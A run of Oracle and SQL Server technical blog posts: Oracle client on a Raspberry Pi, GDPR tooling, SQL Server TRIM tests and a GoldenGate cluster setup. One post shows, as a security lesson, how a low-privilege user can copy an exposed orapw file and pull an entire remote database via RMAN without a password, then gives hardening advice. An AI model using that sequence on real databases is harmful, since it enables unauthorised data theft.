Is it actually possible to run the normal Oracle thick/fat Client on the Pi? As the Oracle Client binaries are not available for the ARM processor it seems impossible, but by emulating the x86 platform you actually can do it.

The easiest way to run x86 code on a Raspberry Pi is to buy the product ExaGear Desktop from Eltechs ( https://eltechs.com ) for around 20 Euros (they usually sell it for 16 Euros).
REMARK: You can also install the QEMU image from https://github.com/AlbrechtL/RPi-QEMU-x86-wine , but that requires quite a bit more effort.

What is ExaGear? ExaGear is an emulator (i.e. a virtual machine) which emulates an x86 Debian Linux on your Raspberry Pi. After downloading and unzipping ExaGear, it is installed easily on the Pi with just:


$ sudo ./install-exagear.sh

Afterwards you can start it with the command exagear:


pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.9.59-v7+ #1047 SMP Sun Oct 29 12:19:23 GMT 2017 armv7l GNU/Linux
pi@raspberrypi:~ $ exagear
Starting /bin/bash in the guest image /opt/exagear/images/debian-8
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.9.59-v7+ #1047 SMP Sun Oct 29 12:19:23 GMT 2017 i686 GNU/Linux
pi@raspberrypi:~ $ arch
i686

I am now inside the x86 world. I.e. I can use this guest shell as if it were running on an x86 machine.
First I update the repositories:


pi@raspberrypi:~ $ sudo apt-get update
...

The next step is to download the Oracle 32-bit 12.2 client software to the Raspberry Pi. To be able to install the Oracle software, a couple of libraries and programs need to be installed, i.e. inside exagear:


pi@raspberrypi:~/Oracle/Downloads/client32 $ sudo apt-get install libxrender1 libxtst6 libxi6 libaio1 make gcc gawk

To avoid some errors I also had to create 3 symbolic links:


pi@raspberrypi:~/Oracle/Downloads/client32 $ sudo ln -s /usr/lib/i386-linux-gnu/libpthread_nonshared.a /usr/lib/libpthread_nonshared.a
pi@raspberrypi:~/Oracle/Downloads/client32 $ sudo ln -s /usr/lib/i386-linux-gnu/libc_nonshared.a /usr/lib/libc_nonshared.a
pi@raspberrypi:~/Oracle/Downloads/client32 $ sudo ln -s /usr/bin/awk /bin/awk

At that point I could install the Oracle Client software as usual:


pi@raspberrypi:~/Oracle/Downloads/client32 $ ./runInstaller
Starting Oracle Universal Installer...
 
Checking Temp space: must be greater than 415 MB. Actual 1522 MB Passed
Checking swap space: must be greater than 150 MB. Actual 828 MB Passed
Checking monitor: must be configured to display at least 256 colors
>>> Could not execute /usr/bin/xdpyinfo Failed <<<<
 
Some requirement checks failed. You must fulfill these requirements before
 
continuing with the installation,
 
Continue? (y/n) [n] y

xdpyinfo can be installed with the x11-utils package on Debian, but it's actually not necessary, so just continue by answering "y" at the prompt.

The rest is a normal Oracle-Client installation. Here some screen shots:

(screenshots: runInstaller1_1, runInstaller2, runInstaller6, runInstaller8, runInstaller10, runInstaller12)

I created a small script to set the environment and was then able to run the client software:


pi@raspberrypi:~ $ more oraclient.sh
#!/bin/bash
 
export ORACLE_HOME=/home/pi/Oracle/app/pi/product/12.2.0/client_1
export PATH=$ORACLE_HOME/bin:$PATH
pi@raspberrypi:~ $ . ./oraclient.sh
pi@raspberrypi:~ $ sqlplus cbleile/cbleile@192.168.178.65:1521/prem122.localdomain
 
SQL*Plus: Release 12.2.0.1.0 Production on Tue Jan 9 16:04:36 2018
 
Copyright (c) 1982, 2016, Oracle. All rights reserved.
 
Last Successful login time: Thu Jan 04 2018 22:33:09 +01:00
 
Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
 
SQL> select count(*) from all_objects;
 
COUNT(*)
----------
19640
 
SQL>
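A side note: instead of the EZConnect string, a TNS alias works as well. A minimal sketch of $ORACLE_HOME/network/admin/tnsnames.ora for the connection used above (the alias name PREM122 is arbitrary):

PREM122 =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.65)(PORT = 1521))
    (CONNECT_DATA = (SERVICE_NAME = prem122.localdomain))
  )

pi@raspberrypi:~ $ sqlplus cbleile/cbleile@PREM122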

Everything worked as expected. I actually haven’t found any issue with the available Oracle programs:


pi@raspberrypi:~ $ ls $ORACLE_HOME/bin
adapters expdp lcsscan orapki.bat statusnc
adrci expdpO linkshlib oraxml symfind
adrciO extjob lmsgen oraxsl sysresv
aqxmlctl extjobo loadjava orion tkprof
aqxmlctl.pl extproc loadpsp osdbagrp tkprofO
bndlchk extprocO loadpspO osh tnsping
coraenv genagtsh lxchknlb ott tnsping0
dbfs_client genclntsh lxegen owm trcasst
dbgeu_run_action.pl genclntst lxinst platform_common trcroute
dbhome genezi mkstore plshprof trcroute0
dbshut geneziO mkstore.bat plshprofO uidrvci
dbstart gennfgt ncomp proc uidrvciO
deploync gennttab netmgr rconfig umu
dg4pwd genoccish oerr relink unzip
dg4pwdO genorasdksh oerr.pl rman wrap
dgmgrl gensyslib ojvmjava rmanO wrc
diagsetup imp ojvmtc roohctl wrcO
diskmon.bin impO orabase schema xml
dropjava impdp orabaseconfig skgxpinfo xmlwf
echodo impdpO orabasehome sqlldr zip
eusm kgmgr oraenv sqlldrO
exp kgmgrO orajaxb sqlplus
expO lbuilder orapki srvctl
pi@raspberrypi:~ $

Just for fun I started a Data Guard Observer on my Raspberry Pi and let it perform a fast-start failover followed by reinstating the previous primary DB:


pi@raspberrypi:~ $ dgmgrl
DGMGRL for Linux: Release 12.2.0.1.0 - Production on Tue Jan 9 17:08:31 2018
 
Copyright (c) 1982, 2017, Oracle and/or its affiliates. All rights reserved.
 
Welcome to DGMGRL, type "help" for information.
DGMGRL> connect sys/manager@tismeds1
Connected to "TISMEDS1"
Connected as SYSDBA.
DGMGRL> show configuration;
 
Configuration - TISMED
 
Protection Mode: MaxAvailability
Members:
TISMEDS1 - Primary database
TISMEDS2 - Physical standby database
 
Fast-Start Failover: DISABLED
 
Configuration Status:
SUCCESS (status updated 49 seconds ago)
 
DGMGRL> ENABLE FAST_START FAILOVER ;
Enabled.
DGMGRL> start observer;
[W000 01/09 17:09:16.20] FSFO target standby is TISMEDS2
[W000 01/09 17:09:20.18] Observer trace level is set to USER
[W000 01/09 17:09:20.19] Try to connect to the primary.
[W000 01/09 17:09:20.20] Try to connect to the primary TISMEDS1.
[W000 01/09 17:09:20.28] The standby TISMEDS2 is ready to be a FSFO target
[W000 01/09 17:09:22.29] Connection to the primary restored!
[W000 01/09 17:09:24.35] Disconnecting from database TISMEDS1.
[W000 01/09 17:10:32.84] Primary database cannot be reached.
[W000 01/09 17:10:49.29] Primary database cannot be reached.
[W000 01/09 17:10:49.30] Fast-Start Failover threshold has expired.
[W000 01/09 17:10:49.31] Try to connect to the standby.
[W000 01/09 17:10:49.32] Making a last connection attempt to primary database before proceeding with Fast-Start Failover.
[W000 01/09 17:10:49.33] Check if the standby is ready for failover.
[S002 01/09 17:10:50.03] Fast-Start Failover started...
 
17:10:50.04 Tuesday, January 09, 2018
Initiating Fast-Start Failover to database "TISMEDS2"...
[S002 01/09 17:10:50.05] Initiating Fast-start Failover.
Performing failover NOW, please wait...
Unable to connect to database using TISMEDS1
ORA-12543: TNS:destination host unreachable
 
Failover succeeded, new primary is "TISMEDS2"
17:10:52.79 Tuesday, January 09, 2018
[S002 01/09 17:10:52.80] Fast-Start Failover finished...
[W000 01/09 17:10:52.81] Failover succeeded. Restart pinging.
[W000 01/09 17:10:52.88] Primary database has changed to TISMEDS2.
[W000 01/09 17:10:52.91] Try to connect to the primary.
[W000 01/09 17:10:52.92] Try to connect to the primary TISMEDS2.
[W000 01/09 17:10:54.33] The standby TISMEDS1 needs to be reinstated
[W000 01/09 17:10:54.34] Try to connect to the new standby TISMEDS1.
[W000 01/09 17:10:54.35] Connection to the primary restored!
Unable to connect to database using TISMEDS1
ORA-12543: TNS:destination host unreachable
 
[W000 01/09 17:10:56.36] Disconnecting from database TISMEDS2.
[W000 01/09 17:11:24.84] Try to connect to the new standby TISMEDS1.
Unable to connect to database using TISMEDS1
ORA-12543: TNS:destination host unreachable
 
[W000 01/09 17:11:54.85] Try to connect to the new standby TISMEDS1.
Unable to connect to database using TISMEDS1
ORA-12541: TNS:no listener
 
[W000 01/09 17:12:24.17] Try to connect to the new standby TISMEDS1.
Unable to connect to database using TISMEDS1
ORA-12541: TNS:no listener
 
[W000 01/09 17:12:54.54] Try to connect to the new standby TISMEDS1.
[W000 01/09 17:12:57.58] Connection to the new standby restored!
[W000 01/09 17:12:57.63] Failed to ping the new standby.
[W000 01/09 17:12:58.64] Try to connect to the new standby TISMEDS1.
[W000 01/09 17:13:00.65] Connection to the new standby restored!
[W000 01/09 17:13:32.32] Try to connect to the primary TISMEDS2.
[W000 01/09 17:13:34.36] Connection to the primary restored!
[W000 01/09 17:13:35.37] Wait for new primary to be ready to reinstate.
[W000 01/09 17:13:36.38] New primary is now ready to reinstate.
[W000 01/09 17:13:36.38] Issuing REINSTATE command.
 
17:13:36.39 Tuesday, January 09, 2018
Initiating reinstatement for database "TISMEDS1"...
Reinstating database "TISMEDS1", please wait...
[W000 01/09 17:13:54.64] The standby TISMEDS1 is ready to be a FSFO target
Reinstatement of database "TISMEDS1" succeeded
17:13:56.24 Tuesday, January 09, 2018
[W000 01/09 17:13:56.65] Successfully reinstated database TISMEDS1.
[W000 01/09 17:13:57.70] The reinstatement of standby TISMEDS1 was just done

Summary: Is it possible to run an Oracle client on the Raspberry Pi? Yes, it is! Running native Java applications using JDBC Thin connections is not a problem at all. Running a fat Oracle Client is possible as well, using x86 emulation software. Is this supported by Oracle? I assume that, as with any other non-Oracle VM solution, you would have to reproduce possible issues on a bare metal x86 platform to be able to open a Service Request.

Anyway, if you plan to run an Oracle 18c XE DB at home (see e.g. here
https://ora-00001.blogspot.de/2017/10/oracle-xe-12c-becomes-oracle-xe-18c.html )
then you might consider running your client on a Raspberry Pi ;-)

 

The post Running the Oracle Client on a Raspberry Pi appeared first on the dbi services blog.

Keep your orapw password file secure

Fri, 2018-01-05 06:02

This is a small demo I did when I found a database password file (orapw) lying around in /tmp with -rw-rw-rw- permissions, to show why this is a bad idea. People think that the orapw file only contains hashes to validate a given password, and forget that it can be used to connect to a remote database without a password.

I can easily imagine why the orapw file was there in /tmp. To build a standby database, you need to copy the password file to the standby server. If you don't have direct access to the oracle user, but only sudo access for 'security reasons', you can't scp easily. So you copy the file to /tmp, make it readable by all users, and then you can scp with your own user.

In this demo I don’t even have access to the host. I’ve only access to connect to a PDB with the SCOTT users, reated with utlsampl.sql, with those additional privileges, a read access on $ORACLE_HOME/dbs:

SQL> connect sys/oracle@//192.168.56.122/PDB1 as sysdba

Connected.

SQL> create or replace directory DBS as '/u01/app/oracle/product/12.2.0/dbhome_1/dbs';

Directory DBS created.

SQL> grant read on directory DBS to SCOTT;

Grant succeeded.
People tend to grant many privileges, and think that a read access on a directory which is supposed to contain only configuration files is harmless. Let’s see what you can do from another server.

Get the orapw file from a remote connection

I connect with SCOTT which can read from ORACLE_HOME/dbs:

SQL> connect scott/tiger@//192.168.56.122/PDB1

Connected.

SQL> show user

USER is "SCOTT"

SQL> select * from all_directories;

OWNER DIRECTORY_NAME DIRECTORY_PATH ORIGIN_CON_ID

----- -------------- -------------- -------------

SYS DBS /u01/app/oracle/product/12.2.0/dbhome_1/dbs 4
I create a table to read this file (other possibilities: UTL_FILE, external tables, …):

SQL> create table DEMO ( b blob );

Table DEMO created.

SQL> insert into demo values ( bfilename('DBS','orapwCDB1') );

1 row inserted.
I’m on another server with the same version of Oracle Database software installed.

I use sqlcl to retrieve the server file to my client:

sqlcl -s scott/tiger@//192.168.56.120/PDB1 <<EOF | xxd -p -r > $ORACLE_HOME/dbs/orapwCDB1
set pages 0 lin 17000 long 1000000000 longc 16384
select * from DEMO;
exit
EOF
This (a trick documented by Laurent Schneider) uses sqlcl to display the BLOB as hexadecimal code and xxd (installed with vim-common) to revert it to binary.

So, on my server I have a copy of the database password file for the database I want to steal:

[oracle@VM122 ~]$ strings /u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapwCDB1

ORACLE Remote Password file

X)l)|

SYSDG

+933k\

SYSBACKUP

f ts6 $9

SYSKM

Pull

A nice feature of 12c is the ability to pull backups from a service: with this, it is the destination that connects to the source (I have diagrams to explain it here). It is an easy alternative to RMAN DUPLICATE (see MOS Doc ID 2283978.1, Creating a Physical Standby database using RMAN restore from service). And one difference is that you don't have to provide the password:

I prepare a small init.ora and directory for the datafiles

echo "db_name=CDB1" > $ORACLE_HOME/dbs/initCDB1.ora

mkdir -p /u01/oradata/CDB1
I’m still on my server with the copy of the remote orapw file and a network access to the source database and I just restore it, without the need for a password:

RMAN> connect target /

connected to target database (not started)
I start a local instance:

RMAN> startup nomount force

Oracle instance started

Total System Global Area 859832320 bytes

Fixed Size 8798552 bytes

Variable Size 784338600 bytes

Database Buffers 58720256 bytes

Redo Buffers 7974912 bytes
I restore the controlfile:

RMAN> restore controlfile from service '//192.168.56.122/CDB1';

Starting restore at 05-JAN-18

using target database control file instead of recovery catalog

allocated channel: ORA_DISK_1

channel ORA_DISK_1: SID=262 device type=DISK

channel ORA_DISK_1: starting datafile backup set restore

channel ORA_DISK_1: using network backup set from service //192.168.56.122/CDB1

channel ORA_DISK_1: restoring control file

channel ORA_DISK_1: restore complete, elapsed time: 00:00:02

output file name=/u01/oradata/CDB1/control01.ctl

output file name=/u01/fast_recovery_area/CDB1/control02.ctl

Finished restore at 05-JAN-18
That’s the interesting part because it has to be connected, at least as SYSOPER, to the source database but I didn’t provide any password.

I mount this controlfile locally:

RMAN> alter database mount;

Statement processed

released channel: ORA_DISK_1
And now it is easy to pull the whole database (the CDB with all its PDBs) to my local server:

RMAN> restore database from service '//192.168.56.122/CDB1';

Starting restore at 05-JAN-18

Starting implicit crosscheck backup at 05-JAN-18

allocated channel: ORA_DISK_1

channel ORA_DISK_1: SID=262 device type=DISK

Crosschecked 6 objects

Finished implicit crosscheck backup at 05-JAN-18

Starting implicit crosscheck copy at 05-JAN-18

using channel ORA_DISK_1

Finished implicit crosscheck copy at 05-JAN-18

searching for all files in the recovery area

cataloging files...

cataloging done

List of Cataloged Files

=======================

File Name: /u01/fast_recovery_area/CDB1/autobackup/2018_01_04/o1_mf_s_964524009_f4vzyt59_.bkp

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_15_f4w5vv19_.arc

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_16_f4wmm0t8_.arc

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_14_f4vzjdl1_.arc

using channel ORA_DISK_1

channel ORA_DISK_1: starting datafile backup set restore

channel ORA_DISK_1: using network backup set from service //192.168.56.122/CDB1

channel ORA_DISK_1: specifying datafile(s) to restore from backup set

channel ORA_DISK_1: restoring datafile 00001 to /u01/oradata/CDB1/system01.dbf

channel ORA_DISK_1: restore complete, elapsed time: 00:00:16

channel ORA_DISK_1: starting datafile backup set restore

...
So what?

This is not an issue and is totally expected. In a Data Guard configuration, the primary and standby databases have to communicate with each other and thus need passwordless authentication. This is done with the password file, and this is the reason why you need to copy it rather than just create another one with the same passwords.

So, the file contains more than just a hash of the password (which is required to validate a password), and probably also includes a key (randomly generated when you create the password file) used for passwordless authentication.
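The administrative users covered by the password file (visible in the strings output above: SYSDG, SYSBACKUP, SYSKM, …) can also be listed from the database itself, for example:

SQL> select username, sysdba, sysoper, sysbackup, sysdg, syskm from v$pwfile_users;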

Then, be careful and do not give read access to the orapw files. You must secure them in the same way as an ssh key or an encryption wallet. This includes (a quick permission check follows the list):

  • Do not leave a copy of the orapw file in a shared location
  • Be careful with grants on directories, even in READ
  • Do not grant CREATE ANY DIRECTORY except for a PDB with PATH_PREFIX lockdown
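As a quick sanity check on the database server (a sketch; adjust the SID to yours):

ls -l $ORACLE_HOME/dbs/orapw$ORACLE_SID      # should not be world-readable
chmod 640 $ORACLE_HOME/dbs/orapw$ORACLE_SID  # restrict it if it is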
 

The post Keep your orapw password file secure appeared first on the dbi services blog.

GDPR compliant by installing software editors tools?

Fri, 2018-01-05 02:51

In a few months (on 25 May 2018) the EU General Data Protection Regulation (GDPR) will come into force and will replace the Data Protection Directive 95/46/EC. Its goals are to harmonize data privacy laws across Europe, to protect and empower all EU citizens' data privacy and to reshape the way organizations across the region approach data privacy. You can find all information related to GDPR on https://www.eugdpr.org and the official PDF of the Regulation (EU) 2016/679 on https://gdpr-info.eu/


 

The biggest change of the GDPR compared to the Data Protection Directive 95/46/EC is perhaps the extended jurisdiction, as it applies to all companies processing the personal data of data subjects residing in the Union, regardless of the company's location. But other key points such as penalties, consent, breach notification, right to access, right to be forgotten, data portability, privacy by design and data protection officers have been added to this Regulation.

From 25 May 2018 on, non-compliant organizations will face heavy penalties in terms of fines and reputation. Indeed, according to the Regulation, non-compliant organizations can be fined up to 4% of annual global turnover or €20 million for breaching the GDPR. However there is no minimum fine, nor an automatic fine, in case of violation. To decide whether to impose a fine and its amount, the following items can be taken into consideration: the nature, severity and duration of the violation, the number of persons impacted, the impact on the persons, the measures taken to mitigate the damage, first or subsequent breach, and finally the cooperation with the authority to remedy the violation. There is currently no clear procedure for a foreign authority to collect a fine imposed on a Swiss company without presence in the EU.

The impact of the GDPR is worldwide, since it doesn't only affect EU organizations but all companies processing and holding the personal data of data subjects residing in the European Union, regardless of the company's location. This means that all countries (even Switzerland and the UK) are affected. You can find the official information regarding GDPR provided by the Swiss Confederation on the following link and the current Federal Act on Data Protection here (Note: the Swiss Data Protection Act, which is currently under revision, will incorporate key regulations similar to the GDPR). You can find the status of the UK Data Protection Bill on the following link.

According to the GDPR the personal data definition is the following:
Any information related to a natural person or ‘Data Subject’, that can be used to directly or indirectly identify the person. It can be anything from a name, a photo, an email address, bank details, posts on social networking websites, medical information, or a computer IP address.

To protect this personal data, the GDPR has 99 articles divided into 11 chapters. Two of these articles, article 25 (Data protection by design and by default) and article 32 (Security of processing), are usually put forward by software vendors: Oracle, Microsoft, IBM. These vendors usually use these articles to promote encryption and anonymization tools, which can make sense depending on the personal data hosted, as the GDPR requires an approach adapted to the nature and the scope of the personal data impacted. Indeed, encryption at rest may be appropriate depending on the circumstances, but it is not mandated by the GDPR in every instance.

In other words, technical tools can help you comply with a small subset of the Regulation, but the GDPR is mostly about processes related to personal data identification and treatment. You will probably get a better understanding of what I mean by having a look at the two checklists (one for data controllers and one for data processors) provided by the ICO (UK Information Commissioner's Office) on the following link. After having completed the checklist you will get an overall rating, a list of suggested actions and guidance.

 

The post GDPR compliant by installing software editors tools? appeared first on the dbi services blog.

SQL Server 2017: TRIM not only a replacement of RTRIM and LTRIM

Thu, 2018-01-04 10:38

Last month, I presented a session at the IT-Tage 2017 in Frankfurt am Main with an overview of SQL Server 2017.
During my session I demoed one of the new T-SQL string commands: TRIM.
My demo was very simple, but I also got two very good questions.

Before I write about these questions, I will show you what TRIM is.
This function is a replacement for RTRIM and LTRIM: it deletes all space characters before and after a string.

SELECT Name, RTRIM(LTRIM(Name)) as RLTrim_name, TRIM(Name) as Trim_name 
FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

(screenshot trim01: query result)

As you can see in the result of the query, TRIM() does the same as RTRIM(LTRIM()).

But TRIM also has a second usage: you can give it a set of characters to be deleted, and this use case is very useful.

I made an example with this query to delete all 'A', 'n' and 'e' characters from the names of my previous query:

SELECT Name, TRIM('A,n,e' FROM Name)  as Trim_name, TRIM('A,n,e, ' FROM Name)  as Trim_name2
FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

(screenshot trim02: query result)

In the Trim_name column of the result, I don't get what I expected… The problem is that all name values begin or end with several space characters.
If you look at the Trim_name2 column and its associated query, you will see that I added a space character to the list of characters to remove.
The first interesting question was:

Can I use the char(xx) to define the character to be deleted?

The ASCII code for a Space is 32 (20 in Hex). I test my query with char(32) like this:

SELECT Name, TRIM(char(32) FROM Name)  as Trim_name 
FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

I run the query…

(screenshot trim03: query result)
Yes, it’s works! I can see that my result is without space character.
Now, I try with another character: char(65) à A

SELECT Name, TRIM(char(32) FROM Name) as Trim_name , TRIM(char(65) FROM Name)  as Trim_name2 
FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

(screenshot trim04: query result)

The result is what I expected, with the 'A' deleted at the beginning of the string.
My last test is with both characters together in the same TRIM function, like this:

SELECT Name, TRIM(char(32),char(65) FROM Name) as Trim_name 
FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

(screenshot trim05: query result)

As you can see, I get an error. Incorrect syntax near the keyword ‘FROM’.

This is perhaps not the right way, so I try another syntax with 'char(32),char(65)':

SELECT Name, TRIM('char(32),char(65)' FROM Name) as Trim_name

FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

(screenshot trim06: query result)

The result is very strange. The character A at the beginning of the string is deleted but not the space character…

This does not work! :oops:

Let’s go to the second question
The second question was:

Can I use a variable?

My first test with a variable is very simple, with the same character set that I used in my demo:

DECLARE @characters nvarchar(10);
SET @characters= 'A,n,e, '
SELECT Name, TRIM(@characters FROM Name)  as Trim_name FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

(screenshot trim07: query result)
It’s working fine.
Now, I will try with the ASCII code.

First I try with one character:

DECLARE @characters nvarchar(10);
SET @characters= char(32)
SELECT Name, TRIM(@characters FROM Name)  as Trim_name FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

(screenshot trim11: query result)

I try with several characters.

DECLARE @characters nvarchar(10);
SET @characters= 'char(32),char(65)'
SELECT Name, TRIM(@characters FROM Name)  as Trim_name FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

(screenshot trim08: query result)
As you can see, the variable with several characters in ASCII code does not work.
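The reason is that the variable contains the literal text 'char(32),char(65)' (truncated to the variable length), not the two characters themselves, so TRIM removes any of those individual characters: the leading 'A' disappears (matched by 'a' with a case-insensitive collation, presumably) while the space remains. A sketch of what should work instead, concatenating the CHAR() values into the variable (same test table as above):

DECLARE @characters nvarchar(10);
SET @characters = CHAR(32) + CHAR(65);
SELECT Name, TRIM(@characters FROM Name) as Trim_name
FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'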

Summary

To finish, I summarize all my tests in a little report:

Direct characters set: ok
Space character in ASCII code: ok
One character in ASCII code: ok
Multiple characters in ASCII code: nok
Variable with several characters: ok
Variable with one character in ASCII code: ok
Variable with multiple characters in ASCII code: nok

 

 

The post SQL Server 2017: TRIM not only a replacement of RTRIM and LTRIM appeared first on the dbi services blog.

GoldenGate 12.2.0.2 installation in a Grid Infrastructure 12cR2

Thu, 2018-01-04 08:55

This post is a demonstration of how to deploy a fully supported Oracle GoldenGate instance as a cluster resource.

We are going to use the Oracle Grid Infrastructure Agents, called XAG, to integrate the GoldenGate instance within our cluster as a cluster-managed resource. This tool is provided by Oracle in the Grid Infrastructure binaries with release 12c and later, but it is recommended to download and use the latest standalone version (available here).

XAG provides an interface, "agctl", which enables us to interact with GoldenGate resources the same way "srvctl" does for Oracle database resources within the cluster. The tool supports various products that can be integrated into the Oracle cluster, like Tomcat, MySQL and so on.

Here what’s can be done with XAG:

[oracle@rac001 ~]$ agctl
Manages Apache Tomcat, Apache Webserver, Goldengate, JDE Enterprise Server, MySQL Server, Peoplesoft App Server, Peoplesoft Batch Server, Peoplesoft PIA Server, Siebel Gateway, Siebel Server, WebLogic Administration Server as Oracle Clusterware Resources

Usage: agctl <verb> <object> [<options>]
   verbs: add|check|config|disable|enable|modify|query|relocate|remove|start|status|stop
   objects: apache_tomcat|apache_webserver|goldengate|jde_enterprise_server|mysql_server|peoplesoft_app_server|peoplesoft_batch_server|peoplesoft_pia_server|siebel_gateway|siebel_server|weblogic_admin_server
For detailed help on each verb and object and its options use:
   agctl <verb> --help or
   agctl <verb> <object> --help

We are going to deploy this GoldenGate HA configuration on top of our existing 12.2 Grid Infrastructure. For this demo I chose to deploy the whole GoldenGate instance and its binaries to a dedicated ACFS mount point, to be sure my GoldenGate resources have access to their data regardless of the node the instance is running on. It could also be DBFS or NFS.

Step 1 – Create an ACFS mount point called /acfsgg

[oracle@rac001 Disk1]$ /u01/app/12.2.0/grid/bin/asmcmd volcreate -G DGFRA -s 4G --width 1M --column 8 ACFSGG

[root@rac001 ~]# /sbin/mkfs -t acfs /dev/asm/acfsgg-215
[root@rac001 ~]# /u01/app/12.2.0/grid/bin/srvctl add filesystem -d /dev/asm/acfsgg-215 -m /acfsgg -u oracle -fstype ACFS -autostart ALWAYS
[root@rac001 ~]# /u01/app/12.2.0/grid/bin/srvctl start filesystem -d /dev/asm/acfsgg-215
[root@rac001 ~]# chown oracle:oinstall /acfsgg
[root@rac001 ~]# chmod 775 /acfsgg

[oracle@rac001 ~]$ ./execall "df -hT /acfsgg"
rac001: Filesystem          Type  Size  Used Avail Use% Mounted on
rac001: /dev/asm/acfsgg-215 acfs  4.0G   85M  4.0G   3% /acfsgg
rac002: Filesystem          Type  Size  Used Avail Use% Mounted on
rac002: /dev/asm/acfsgg-215 acfs  4.0G   85M  4.0G   3% /acfsgg

 

Step 2 – install GoldenGate binaries in /acfsgg

cd /u01/install/
unzip 122022_fbo_ggs_Linux_x64_shiphome.zip
cd fbo_ggs_Linux_x64_shiphome/Disk1

[oracle@rac001 Disk1]$ ./runInstaller -silent -nowait -showProgress \
INSTALL_OPTION=ORA12c \
SOFTWARE_LOCATION=/acfsgg \
START_MANAGER=false \
MANAGER_PORT= \
DATABASE_LOCATION= \
INVENTORY_LOCATION=/u01/app/oraInventory \
UNIX_GROUP_NAME=oinstall

[...]
Finish Setup successful.
The installation of Oracle GoldenGate Core was successful.
Please check '/u01/app/oraInventory/logs/silentInstall2018-01-04_06-37-02AM.log' for more details.
Successfully Setup Software.

 

Step 3 – install the latest version of XAG (recommended by Oracle) on all nodes

# creation of the XAG home on all nodes as root
[root@rac001 ~]# mkdir /u01/app/xag
[root@rac001 ~]# chown oracle. /u01/app/xag

# back as oracle
[oracle@rac001 ~]$ cd /u01/install/
[oracle@rac001 install]$ unzip xagpack.zip
[oracle@rac001 xag]$ cd xag

[oracle@rac001 xag]$ export XAG_HOME=/u01/app/xag

[oracle@rac001 xag]$ ./xagsetup.sh --install --directory $XAG_HOME --all_nodes
Installing Oracle Grid Infrastructure Agents on: rac001
Installing Oracle Grid Infrastructure Agents on: rac002
Done.

[oracle@rac001 xag]$ /u01/app/12.2.0/grid/bin/agctl query releaseversion
The Oracle Grid Infrastructure Agents release version is 7.1.0

[oracle@rac001 xag]$ $XAG_HOME/bin/agctl query releaseversion
The Oracle Grid Infrastructure Agents release version is 8.1.0

 

Step 4 – configure GoldenGate instance and the manager

[oracle@rac002 acfsgg]$ export ORACLE_HOME=/u01/app/oracle/product/12.2.0/dbhome_1
[oracle@rac002 acfsgg]$ export LD_LIBRARY_PATH=$ORACLE_HOME/lib
[oracle@rac002 acfsgg]$ ./ggsci

Oracle GoldenGate Command Interpreter for Oracle
Version 12.2.0.2.2 OGGCORE_12.2.0.2.0_PLATFORMS_170630.0419_FBO
Linux, x64, 64bit (optimized), Oracle 12c on Jun 30 2017 16:12:28
Operating system character set identified as UTF-8.

Copyright (C) 1995, 2017, Oracle and/or its affiliates. All rights reserved.


GGSCI (rac001) 1> CREATE SUBDIRS

Creating subdirectories under current directory /acfsgg

Parameter files                /acfsgg/dirprm: created
Report files                   /acfsgg/dirrpt: created
Checkpoint files               /acfsgg/dirchk: created
Process status files           /acfsgg/dirpcs: created
SQL script files               /acfsgg/dirsql: created
Database definitions files     /acfsgg/dirdef: created
Extract data files             /acfsgg/dirdat: created
Temporary files                /acfsgg/dirtmp: created
Credential store files         /acfsgg/dircrd: created
Masterkey wallet files         /acfsgg/dirwlt: created
Dump files                     /acfsgg/dirdmp: created

GGSCI (rac001) 2> edit params mgr

PORT 7809
AUTORESTART ER *, RETRIES 3, WAITMINUTES 3, RESETMINUTES 10
AUTOSTART ER *
PURGEOLDEXTRACTS ./dirdat/*, USECHECKPOINTS
LAGCRITICALMINUTES 5
LAGREPORTMINUTES 60
LAGINFOMINUTES 0

 

Step 5 – Add the GoldenGate resource to the cluster

[root@rac001 ~]# export XAG_HOME=/u01/app/xag
[root@rac001 ~]# $XAG_HOME/bin/agctl add goldengate GGAPP01 --gg_home /acfsgg --instance_type source --oracle_home /u01/app/oracle/product/12.2.0/dbhome_1 --ip 192.168.179.15 --network 1 --user oracle --filesystems ora.dgfra.acfsgg.acfs
Calling POSIX::isdigit() is deprecated at /u01/app/xag/agcommon.pm line 809.

## all parameters in above command are required except the FS specification

[oracle@rac001 ~]$ $XAG_HOME/bin/agctl start goldengate GGAPP01

[oracle@rac001 ~]$ $XAG_HOME/bin/agctl status goldengate GGAPP01
Goldengate  instance 'GGAPP01' is running on rac001

[oracle@rac001 ~]$ /u01/app/12.2.0/grid/bin/crsctl stat res -t
[...]
Cluster Resources
--------------------------------------------------------------------------------
[...]
xag.GGAPP01-vip.vip
      1        ONLINE  ONLINE       rac001                   STABLE
xag.GGAPP01.goldengate
      1        ONLINE  ONLINE       rac001                   STABLE
--------------------------------------------------------------------------------

At this stage we have an operational GoldenGate fully managed by the cluster and ready to be configured for replication.

In case of failure of the node running the Manager, the cluster will restart the Manager process on the first remaining available node. As soon as the Manager starts, it will automatically restart all Extract and Replicat processes, as we instructed it in the Manager configuration file (AUTOSTART parameter). The restart of the Extract and Replicat processes is therefore done by the Manager and not by the cluster (so far, with this release).
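To test this behaviour without crashing a node, the resource can also be moved manually with the relocate verb shown in the agctl usage above (the --node option is an assumption here; check agctl relocate goldengate --help):

[oracle@rac001 ~]$ $XAG_HOME/bin/agctl relocate goldengate GGAPP01 --node rac002
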